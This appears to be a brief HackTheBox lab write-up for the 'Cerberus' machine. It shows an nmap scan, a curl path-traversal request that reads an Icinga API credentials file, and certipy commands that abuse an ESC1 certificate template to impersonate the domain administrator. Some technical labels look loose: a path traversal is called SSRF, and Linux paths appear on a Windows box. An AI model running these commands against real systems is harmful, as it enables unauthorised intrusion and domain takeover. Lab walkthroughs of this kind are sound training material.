HTB Writeup — Cerberus
Full walkthrough of the HackTheBox Cerberus machine covering initial enumeration, SSRF exploitation, and privilege escalation through a misconfigured AD certificate template.
HackTheBox: Cerberus
Difficulty: Hard
OS: Windows
Key Topics: SSRF, Active Directory Certificate Services, Kerberos
Enumeration
Starting with a full port scan reveals a web service on port 8080 and standard AD services.
nmap -sCV -p- -T4 10.10.11.xxx -oN cerberus.nmap
Interesting findings:
- Port 8080 — Icinga Web 2 monitoring dashboard
- Port 88 — Kerberos
- Port 445 — SMB (signing required)
Initial Foothold
The Icinga instance is vulnerable to CVE-2022-24715 — an authenticated SSRF that can be chained with a file read to extract credentials from the internal management interface.
# Exploit the SSRF to hit the internal API
curl -k "https://target:8080/icingaweb2/lib/icinga/..%2f..%2f..%2fetc/icinga2/features-enabled/api.conf"
Lateral Movement
With the extracted API credentials, we authenticate to the Icinga2 API and trigger a reverse shell via a custom check command.
Privilege Escalation
The domain has a misconfigured certificate template (ESC1) allowing any authenticated user to request a certificate as the Domain Admin.
certipy find -u user@cerberus.htb -p 'P@ssword' -dc-ip 10.10.11.xxx
certipy req -u user@cerberus.htb -p 'P@ssword' -ca CERBERUS-CA -template VulnTemplate -upn administrator@cerberus.htb
Root Flag
cat /root/root.txt
# [REDACTED]
Lessons Learned
- Always check for ADCS misconfigurations — ESC1 through ESC8 are common in enterprise environments.
- SSRF is often underestimated; chained with internal services, it can lead to full compromise.